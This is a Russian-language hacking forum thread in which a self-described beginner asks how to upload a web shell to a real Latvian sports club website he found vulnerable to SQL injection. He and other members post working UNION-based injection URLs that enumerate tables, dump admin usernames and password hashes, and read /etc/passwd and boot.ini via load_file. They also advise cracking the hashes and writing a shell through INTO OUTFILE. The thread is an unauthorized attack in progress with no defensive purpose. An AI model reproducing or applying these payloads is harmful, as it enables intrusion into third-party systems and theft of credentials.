Помогите залить шелл

Discussion in 'Уязвимости' started by br1tva, 26 Dec 2007.

  1. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    Доброе время суток. Значит так , дело было вечером и делать естественно было нечего.
    И после просмотра очередного видео о SQL inj и заливе шела я решил попробывать это сам.
    Первое что я сделал нашол жертву своих коварных замыслов:
    После того как жертва была найдена я проверил саит на наличие скуля:

    http://www.site.lv/?p=news&off=&id=10`4
    Ура скуль найден.

    Далие нахожу количество полей...
    http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,3,4,5,6/*

    Потом смотрю название и версию БД....
    http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,version(),4,5,6/*
    http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,database(),4,5,6/*
    Получил версию : 5.0.21-community-nt
    и название ДБ : xxx

    Теперь было бы неплохо найти узеров + их пароли к адм панели саита...
    http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,user,4,5,6+from+users/*
    http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,pass,4,5,6+from+users/*
    И тут опять же удача мне улыбнулась и после этих 2 запросов я получил 3 узернаме и пароли к ним.

    Зайдя в адм панель ничего интересного я там ненашол кроме ДОБАВИТЙ ИЗМЕНИТЙ УДАЛИТЙ новости.... это меня огарчило и на некоторе время загнало в тупик , так как незнал што делатй дальше..
    Немного подумав решил наити таблици в ДБ и составил такои запрос:
    http://www.site.lv/?p=news&off=&id=-1045+UNION+SELECT+1,2,table_name,4,5,6+from+information_schema.tables/*
    После этого запроса получил название всех таблиц:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    phpbb_auth_access
    phpbb_banlist
    phpbb_categories
    phpbb_config
    phpbb_confirm
    phpbb_disallow
    phpbb_forum_prune
    phpbb_forums
    phpbb_groups
    phpbb_posts
    phpbb_posts_text
    phpbb_privmsgs
    phpbb_privmsgs_text
    phpbb_ranks
    phpbb_search_results
    phpbb_search_wordlist
    phpbb_search_wordmatch
    phpbb_sessions
    phpbb_smilies
    phpbb_themes
    phpbb_themes_name
    phpbb_topics
    phpbb_topics_watch
    phpbb_user_group
    phpbb_users
    phpbb_vote_desc
    phpbb_vote_results
    phpbb_vote_voters
    phpbb_words
    countries
    countries_
    matches
    matches2005
    matches2006
    matches2007
    news
    players
    players_
    positions
    teams
    teams_
    users
    visit

    И на этом я остановился ,так как незнаю что необходимо сделать дальше для того что би залить шелл...
    Может ктонибудь мог бы мне немного подсказать ....

    P.S Hе судите меня строго , я весго лиш новичок...
     
    #1 br1tva, 26 Dec 2007
    Last edited: 26 Dec 2007
    3 people like this.
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    602
    Likes Received:
    485
    Reputations:
    176
    Попробуй к фтп подконнектиться =)
    ftp://user:password@site.lv
     
    #2 AFoST, 26 Dec 2007
    Last edited: 26 Dec 2007
  3. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    591
    Likes Received:
    465
    Reputations:
    5
    ну так залезай в phpbb_users доставай хеши админов - бруть их - залезай в админку - и сливай базу ...
     
  4. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Выводи логин и пасс админа из phpbb_users, расшифровывай хеш, заливай шелл. ;)
     
  5. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    А можно немного поподробней... ? Какой нужен запрос ???
     
  6. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    591
    Likes Received:
    465
    Reputations:
    5
    http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,concat(username,0x3a,user_password),4,5,6+from+phpbb_users/*
     
  7. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    175
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.site.lv/?p=news&off=&id=-1045+UNION+SELECT+1,2,concat_ws(0x3a,username,user_password,user_email,user_icq),4,5,6+from+fkvbb.phpbb_users/*
    =\
     
    #7 Maxyks, 26 Dec 2007
    Last edited: 26 Dec 2007
    2 people like this.
  8. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    602
    Likes Received:
    485
    Reputations:
    176
    Nea7, палево :-D
     
    1 person likes this.
  9. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    Сделав такой запрос получил такой erorr:
    Table 'fkventspils.phpbb_users' doesn't exist

    А почему fkventspils.phpbb_users если в моём запросе phpbb_users?

    Форум находится http://www.site.lv/forum/
    Может это как то влияет ?
     
  10. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Автоматически подставляется текущая бд, а именно fkventspils. А бд форума называется по другому.
    Code:
    http://www.fkve****.lv/?p=news&off=&id=-104+union+select+1,2,table_schema,4,5,6+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+0,1/*
    Вот и узнали, что данные форума лежат у нас в fkvbb.
    Составляем запрос:
    Code:
    http://www.fkve****.lv/?p=news&off=&id=-104+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6+from+fkvbb.phpbb_users+limit+1,1/*
    Andruxa:7fee56ff9519fdc6c473dee675c4b003
    и т.д. лимитом. (;
     
    #10 delay(0), 27 Dec 2007
    Last edited: 27 Dec 2007
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
    попробуй так
     
  12. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    delay(0) Thanks . )
    Токо вот как ты получил 0x70687062625f7573657273 ?
     
  13. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Перевел название таблицы в hex.
     
  14. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Если есть привилегии file_priv, то мона залить шелл скулем через INTO OUTFILE. А коль есть ПхпББ, то через него конечно удобнее. Как? А вот так:
    https://forum.antichat.ru/showpost.php?p=198446&postcount=3
     
  15. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    А можно немного поподробней об file_priv ...???

    А то немогу расхешировать пароль Админа на phpBB.... :mad:
     
  16. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    короче если прокатит http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
    либо
    http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

    То file_priv есть, иначе его нет :)
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    тогда уж http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file(0x433A2F626F6F742E696E69),4,5,6/*

    так надежней, к тому же как я понял серв виндовый:
     
Loading...